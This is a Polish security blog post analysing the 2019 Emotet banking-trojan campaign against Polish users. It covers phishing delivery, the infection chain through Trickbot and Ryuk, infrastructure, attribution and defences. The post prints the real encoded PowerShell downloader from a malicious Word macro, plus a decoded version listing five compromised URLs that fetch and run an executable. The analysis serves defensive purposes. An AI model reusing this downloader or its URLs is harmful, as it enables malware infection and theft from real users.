Emotet – trojan bankowy w ofensywie bohaterem miesiąca

dodał 20 maja 2019 o 10:30 w kategorii Złośniki  z tagami:
Emotet – trojan bankowy w ofensywie bohaterem miesiąca

Choć do końca miesiąca zostało jeszcze trochę dni, to niektórzy analitycy już teraz stwierdzają, że maj 2019 należy do Emoteta, który funkcjonuje w cyberprzestrzeni od marca 2017, będąc następcą takich trojanów bankowych jak Dridex, Geodo, Feodo.

Jako ofiary malware (a właściwie jego operator) wybiera osoby oraz firmy związane z sektorem finansowym. Skala ataków na świecie jest ogromna, każdego dnia pojawia się ponad kilkaset nowych zainfekowanych dokumentów wraz z kilkuset nowymi serwerami, które je dystrybuują. Malware jest polimorficzny, co oznacza, że niemal każda próbka jest inna, co wyklucza detekcję opartą o mechanizmy sygnaturowe. W ostatnich dniach stale prowadzone są w dużej skali kampanie Emoteta skierowane specjalnie przeciwko polskim użytkownikom (m.in. dobrze przygotowane maile socjotechniczne). Dotychczas Emotet trafiał nas raczej z mniejszym impetem i w ramach ogólnoświatowych kampanii (o czym świadczy brak profilowania maili).

Jak przebiega atak – Kill chain: dostarczenie

Złośliwe oprogramowanie dociera do użytkownika poprzez e-mail. Wykorzystane zostały dwie techniki:

  1. Mail z linkiem do pobrania dokumentu (plik Microsoft Worda w formacie DOC) z zewnętrznego serwera. Treść maila jest tak opracowana, by nie wzbudzić podejrzeń i zachęcić do kliknięcia oraz pobrania dokumentu.
  2. Mail z bezpośrednio załączonym dokumentem.

Czasami pojawiały się kampanie, w których dokument był szyfrowany, a hasło podane w treści maila. Takie działanie utrudnia analizę programom antywirusowym, a u użytkowników buduje poczucie ważności takiego dokumentu, dzięki czemu rzadziej analizują sytuację i są bardziej skłonni do kliknięcia.

Przykłady wiadomości e-mail, które otrzymywali polscy odbiorcy Emoteta
Przykład wiadomości e-mail, które otrzymywali polscy odbiorcy Emoteta
Przykłady wiadomości e-mail, które otrzymywali polscy odbiorcy Emoteta
Przykład wiadomości e-mail, które otrzymywali polscy odbiorcy Emoteta

Sam dokument nie zawiera treści, a jedynie informację, by włączyć możliwość uruchamiania makr (przestępcom to wystarczy). Można by przyjąć, że dokument nie jest złośliwy. Stanowi typowy downloader – z poziomu skryptu rozpoczyna swą aktywność. Wykorzystując skrypt Powershella, łączy się z serwerem dystrybuującym malware, pobiera go, umieszcza w systemie i uruchamia.

Przykłady dokumentów będących nośnikiem Emoteta
Przykład dokumentu będącego nośnikiem Emoteta
Przykłady dokumentów będących nośnikiem Emoteta
Przykład dokumentu będącego nośnikiem Emoteta
Sposób dostarczenia złośliwego oprogramowania
źródło: https://unit42.paloaltonetworks.com/unit42-malware-team-malspam-pushing-emotet-trickbot
Sposób dostarczenia złośliwego oprogramowania
źródło: https://unit42.paloaltonetworks.com/unit42-malware-team-malspam-pushing-emotet-trickbot

Jak przebiega atak – Kill chain: eksploatacja

Makro pobranego dokumentu uruchamia mocno zaciemniony skrypt Powershella.

powershell -e JABMADIAOAA0ADUAMgA9ACcAUAA2ADgAMwA3ADEANwAnADsAJABpADIAMQAwADkANQA3ADgAIAA9ACAAJwA4ADEAMQAnADsAJABTADgANgAxADcAOAA9ACcAVwA4ADYAOAA3ADgAXwA2ACcAOwAkAG8ANAAyADYAOQA0AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABpADIAMQAwADkANQA3ADgAKwAnAC4AZQB4AGUAJwA7ACQAZgA2ADAAMQAwADQAMQA0AD0AJwBkAF8ANABfADUANQA0ACcAOwAkAGkANAA4ADUAMQA5ADYANgA9AC4AKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBFAHQALgBXAGAAZQBCAEMATABpAGUAYABOAFQAOwAkAFIANQA4ADgAMAA2AD0AJwBoAHQAdABwADoALwAvAGQAYQBpAHQAaABhAG4AaAB0AGUAYwBoAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwB0AGwAbQB2AHkAZwBnAGkAdwBtAF8AcQBpAHUAeQByAHcAYwAtADgALwBAAGgAdAB0AHAAOgAvAC8AYQBsAHYAYQBhAGMAdABpAHYAZQB3AGUAYQByAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB6AGkAYwAzAF8ANgBpAGsAZQB5AHMAagA0ADkAMwAtADQAOQA2ADkAMwA1ADUAMwA1AC8AQABoAHQAdABwAHMAOgAvAC8AdQB0AGEAaABkAG8AbgBvAHIAcwBmAG8AcgB1AG0ALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwA3AG4AMAAyAGwANQA1ADgAdAByAF8ANABsADYAbABxAGQALQA4ADcANQA3AC8AQABoAHQAdABwADoALwAvAGwAdQB4AHUAcgBpAG8AdQBzAHIAbwB4AHkALgBjAG8AbQAvAGIAcQBpAGUAcAAvAHQAcgBMAEMAcwBsAGYAcgBuAC8AQABoAHQAdABwADoALwAvAG0AbQBhAGQAYQBtAGUAYwBoAGkAYwAuAG0AZQB1AHMAaABvAHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHgANwA5ADgAOQAxAGMAZABfAHEANwBvADIAMQAyAGQAbQAtADIAMQAzADkANgAvACcALgBzAFAAbABJAHQAKAAnAEAAJwApADsAJABMADcAXwAzADgAOABfADEAPQAnAEEANAAxADgAMAAzADYANAAnADsAZgBvAHIAZQBhAGMAaAAoACQAQgAyADQANQA5ADcAIABpAG4AIAAkAFIANQA4ADgAMAA2ACkAewB0AHIAeQB7ACQAaQA0ADgANQAxADkANgA2AC4AZABPAFcATgBsAG8AYQBkAGYAaQBsAEUAKAAkAEIAMgA0ADUAOQA3ACwAIAAkAG8ANAAyADYAOQA0ACkAOwAkAEwAMQA0ADUAOAAyADUANQA9ACcASQA0ADEAOQAzADEAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABvADQAMgA2ADkANAApAC4ATABFAG4AZwBUAEgAIAAtAGcAZQAgADMAMgA4ADgANwApACAAewAmACgAJwBJACcAKwAnAG4AdgBvAGsAZQAtAEkAdAAnACsAJwBlAG0AJwApACAAJABvADQAMgA2ADkANAA7ACQAVQBfADQANAA0ADQAPQAnAFEANQA5ADAAMgAxADEAJwA7AGIAcgBlAGEAawA7ACQAUQA3ADYANgAzADcAPQAnAHAAOAAzADMANgAwADcAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAdQA5ADAAOABfADIAPQAnAEgAXwA5ADUAMQA0AF8AJwA=

Przykład zaciemnionego skryptu

$L28452='P683717';$i2109578='811';$S86178='W86878_6';$o42694=$env:userprofile+'\'+$i2109578+'exe';$f6010414='d_4_554';
$i4851966=('ne'+'w'+'-objec'+'t')NEtW`eBCLie`NT;$R58806=
'http://daithanhtechcom/wp-includes/tlmvyggiwm_qiuyrwc-8/@
http://alvaactivewearcom/wp-admin/zic3_6ikeysj493-496935535/@
https://utahdonorsforumcom/wp-content/7n02l558tr_4l6lqd-8757/@
http://luxuriousroxycom/bqiep/trLCslfrn/@
http://mmadamechicmeushopcom/wp-admin/x79891cd_q7o212dm-21396/'
sPlIt('@');
$L7_388_1='A4180364';
foreach($B24597in$R58806){
try{$i4851966dOWNloadfilE($B24597,$o42694);$L1458255='I41931';
If((('Get-It'+'em')$o42694)LEngTH-ge32887){&('I'+'nvoke-It'+'em')$o42694;$U_4444='Q590211';break;$Q76637='p833607'}}
catch{}}$u908_2='H_9514_'

„Odciemniony” skrypt wraz ze zdekodowanymi adresami serwerów

Działanie skryptu polega na pobraniu ze zdefiniowanego serwera pliku wykonywalnego i uruchomieniu go. Każda próbka zawiera definicje pięciu lokalizacji serwerów do pobrania kodu do kolejnej fazy infekcji. Analizy wykazują, że pliki te pobierane są z serwerów, które mogły być przejęte przez cyberprzestępców i wykorzystywane bez wiedzy ich właścicieli. Charakterystyczne dla tej fazy ataku jest to, że pobrany plik (dropper) ma nazwę w zakresie liczb do tysiąca (np. 879.exe, 306.exe, 905.exe). Pliki te są charakterystyczne dla poszczególnych kampanii. Dropper zrzuca do systemu plik soundser.exe (we wcześniejszych kampaniachwabmetagen.exe), który jest już właściwym złośliwym Emotetem.

Wywołania procesów w trakcie infekcji
Wywołania procesów w trakcie infekcji
Drzewo procesów: od otwarcia złośliwego dokumentu do połączenia Trickbota z C2
Drzewo procesów: od otwarcia złośliwego dokumentu do połączenia Trickbota z C2

Na tym etapie w systemie zainstalowany jest w pełni funkcjonalny trojan bankowy, który nawiązuje komunikację z serwerem zarządzającym (Command and Control – C2). W tym momencie następuje również uaktywnienie modułów typowych dla złośliwego oprogramowania Trickbot.

Ewolucja Emotet-Trickbot-Ryuk
źródło:  https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware
Ewolucja Emotet-Trickbot-Ryuk
źródło: https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware

Jak przebiega atak – Kill chain: komunikacja z serwerem C2

Emotet-Trickbot wykrada informacje o stacji, na której się znajduje i przesyła dane do serwera C2. By utrudnić analizę, paczka informacji jest zaszyfrowana kluczem RSA i AES, a potem BASE64. Informacje przesyłane są w nagłówku komunikacji HTTP jako element Cookie. Ostatnie wersje Emoteta wysyłają skradzione informacje w treści wiadomości HTTP POST, zamiast używać nagłówka Cookie.

Komunikacja sieciowa z serwerem Command and Control (wersja z payload w cookie)
Komunikacja sieciowa z serwerem Command and Control (wersja z payload w cookie)

Emotet, z pozoru niegroźny, po uzbrojeniu w Trickbota staje się niezwykle niebezpiecznym narzędziem. Potrafi on:

  • wykradać używane w systemie hasła,
  • wykradać hasła do usługi RDP (moduł pwgrab32.dll),
  • rozprzestrzeniać się przez usługę SMB (moduł robaka worm.dll lub spreader.dll), wykorzystując ciągle występującą podatność Eternal Blue (CVE-2017-0143 / MS17-010),
  • używać backdoora Empire Powershell,
  • robić zdjęcia pulpitu (moduł screenlocker.dll),
  • zbierać informacje o systemie i jego otoczeniu (moduł systeminfo.dll),
  • zestawiać połączenie VNC (moduł vncsrv.dll).

Połączenie masowości i łatwości dostarczenia Emoteta z agresywnymi cechami Trickbota (m.in. penetracji sieci – lateral movement) powoduje, że skutki infekcji Emotet + Trickbot są dużo poważniejsze. Bardzo często po udanej infekcji Trickbot ładuje malware Ryuk, który jest typowym ransomware’em i szyfruje dyski na komputerze ofiary. Ten element infekcji kończy zazwyczaj atak.

Infrastruktura

Adresy mailowe ofiar najprawdopodobniej pochodzą z dostępnych baz wycieków z popularnych serwisów internetowych (dla odbiorców z Polski mogą to być baza Collection, baza Morele.net, inne). Maile wysyłane są głównie z przejętych w tym celu kont pocztowych. Jako serwery utrzymujące złośliwe dokumenty czy też Command and Control (C2) wykorzystywane są legalne serwery (głównie strony internetowe) przejęte przez cyberprzestępców. Używanie tak zhakowanych stron internetowych jako serwerów proxy C2 stało się znacznie bardziej powszechne. Technika taka dodaje warstwę ochrony uniemożliwiającą analitykom łatwe znajdowanie i zamykanie rzeczywistego serwera C2. Co więcej, firmom zajmującym się bezpieczeństwem trudno jest oznaczyć serwery jako złośliwe, gdy są one rzeczywiście legalnymi stronami internetowymi, które działają od lat, a nie nowymi serwerami skonfigurowanymi z domenami zakupionymi dzień wcześniej. Obecnie serwis śledzący aktywność malware pokazuje, iż dostępnych jest ok. 55 tysięcy złośliwych próbek, które są dystrybuowane przez aktywne 2793 serwery (po 30 dniach braku aktywności serwer jest uznawany za nieaktywny).

Atrybucja

Skala zbudowanej infrastruktury wykorzystywanej do infekcji oraz zarządzania kampaniami świadczy, że za atakami związanymi z malware Emotet-Trockbot-Ryuk stoi dobrze zorganizowana grupa o dużych możliwościach operacyjnych – grupa klasy State Sponsored. Dobrane cele i charakter ataku sugerują, iż nie są to zwykli przestępcy. Analiza czasu przygotowywania kampanii świadczy, że za atakami stoi organizacja z dalekiej Azji. Podobnie podczas analizy plików DOC widać artefakty języka koreańskiego. Jednak takie ślady to tylko poszlaki, a sama pewna atrybucja w obecnym cyberświecie jest bardzo trudna. Badacze wskazują, iż Ryuk jest wynikiem niestandardowego opracowania starszego szkodliwego oprogramowania znanego jako Hermes, którego autorem jest Stardust Chollima z północnej Korei (aka APT38, uważany za źródło przychodów dobrze znanej grupy Lazarus). Współpraca pomiędzy grupami w cyberświecie znacznie utrudnia dokonywanie atrybucji i mimo że wiele wskazuje na koreańskiego Threat Actora, to równocześnie widać wiele powiązań z innymi zorganizowanymi grupami APT.

Co dalej

Jak się bronić?

  1. Ze względu na to, iż cyberprzestępcy wykorzystują e-maile jako sposób dystrybucji złośliwego oprogramowania, należy wzmocnić detekcję w systemach ochrony poczty, jednak największą korzyść przyniesie zwiększenie świadomości pracowników, by potrafili odróżnić maila z zagrożeniem. Należy ćwiczyć, pokazywać próbki i ostrzegać o trwających kampaniach.
  2. Korzystne będzie także zablokowanie wykorzystywania makr w dokumentach Microsoft Worda (przerwie to łańcuch infekcji).
  3. Warto również zablokować możliwość uruchamiania skryptów Powershella z poziomu procesu Microsoft Worda (też przerwie łańcuch infekcji).
  4. Kolejnym krokiem może być zablokowanie połączeń sieciowych inicjowanych przez skrypty Powershella.